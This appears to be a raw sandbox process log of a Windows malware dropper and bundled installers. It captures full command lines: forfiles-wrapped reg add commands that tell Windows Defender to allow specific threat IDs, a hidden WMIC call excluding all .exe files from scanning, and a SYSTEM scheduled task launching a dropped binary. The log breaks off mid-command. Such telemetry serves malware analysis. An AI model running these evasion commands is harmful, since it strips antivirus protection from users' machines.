C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2232

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2236

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2300

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2388 -ip 2388

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe"

C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe

C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2388 -ip 2388

C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp

"C:\Users\Admin\AppData\Local\Temp\is-U8H3P.tmp\lu3msc4.tmp" /SL5="$180390,3944022,54272,C:\Users\Admin\AppData\Local\Temp\OrugkdTQ\lu3msc4.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2328

C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe

"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe" -i

C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe

"C:\Users\Admin\AppData\Local\Linux MultiMedia Studio\linuxmultiMediastudio32.exe" -s

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388

C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe

C:\Users\Admin\AppData\Local\Temp\HLEFA8bv\axN9H2G7ob3elJr.exe /sid=3 /pid=146

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2356

C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe

C:\Users\Admin\AppData\Local\Temp\nTDijDlZ\dWa7mnZkjotmkVs.exe --silent --allusers=0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2224

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --silent --allusers=0 --server-tracking-blob=NDFlNTE4MjE5YjhlMzYzMWYwNmRjMTU5ZmJiZDgwZWM3MGQ1ZmY1YTc0ZDA1ODM0ZjNiZTU4MzMyODFhMmRiYjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInRpbWVzdGFtcCI6IjE3MTgwNjA5ODAuNDczMiIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS8xMTguMC4wLjAgU2FmYXJpLzUzNy4zNiIsInV0bSI6eyJjYW1wYWlnbiI6Im9wMTMyIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiUlNUUCJ9LCJ1dWlkIjoiOTA3ZmRmYTQtNDZjZi00ZWFkLWI5NjAtOWIyNWU1YzNjMzcwIn0=

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.64 --initial-client-data=0x320,0x324,0x328,0x2fc,0x32c,0x724ef308,0x724ef314,0x724ef320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2356

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe

"C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3612 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240610230947" --session-guid=20cd9283-7421-4fe2-9146-ccbfa1e040ed --server-tracking-blob=ZDIxODE5YWJkZWI1MTI0Yzc5OWI5NGI1YTY2NWE0NzQxMTZiNTE0MjU3ODNiODUyNzEwNjI2OTI0ZWM2MGE5Yzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1SU1RQJnV0bV9jYW1wYWlnbj1vcDEzMiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxODA2MDk4MC40NzMyIiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExOC4wLjAuMCBTYWZhcmkvNTM3LjM2IiwidXRtIjp7ImNhbXBhaWduIjoib3AxMzIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJSU1RQIn0sInV1aWQiOiI5MDdmZGZhNC00NmNmLTRlYWQtYjk2MC05YjI1ZTVjM2MzNzAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0806000000000000

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe

C:\Users\Admin\AppData\Local\Temp\7zS400DD298\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.64 --initial-client-data=0x334,0x338,0x33c,0x304,0x340,0x7195f308,0x7195f314,0x7195f320

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Unblock-File -Path C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1980

C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe

C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe /did=757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2216

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2304

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 2388 -ip 2388

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2072

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2388 -ip 2388

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2296

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2388 -ip 2388

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1884

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 1692

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2004

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\Assistant_110.0.5130.23_Setup.exe_sfx.exe"

C:\Windows\SysWOW64\cmd.exe

/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe" --version

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202406102309471\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=110.0.5130.23 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x5530e8,0x5530f4,0x553100

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bozJhwcBWfTIuPvJGw" /SC once /ST 23:11:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe\" Lo /hgadidoWFv 757674 /S" /V1 /F

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bozJhwcBWfTIuPvJGw"

C:\Windows\SysWOW64\cmd.exe

/C schtasks /run /I /tn bozJhwcBWfTIuPvJGw

\??\c:\windows\SysWOW64\schtasks.exe

schtasks /run /I /tn bozJhwcBWfTIuPvJGw

C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe

C:\Users\Admin\AppData\Local\Temp\5n1Twk67\hFZvbVGXibFffs.exe Lo /hgadidoWFv 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 2388 -ip 2388

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 2064

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

C:\Windows\SysWOW64\cmd.exe

/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

\??\c:\windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

C:\Windows\SysWOW64\forfiles.exe

forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

C:\Windows\SysWOW64\cmd.exe

/C powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell start-process -WindowStyle Hidden gpupdate.exe /force

C:\Windows\SysWOW64\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5072 --field-trial-handle=1892,i,5912308894112296333,2729098928649369848,131072 /prefetch:2

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t 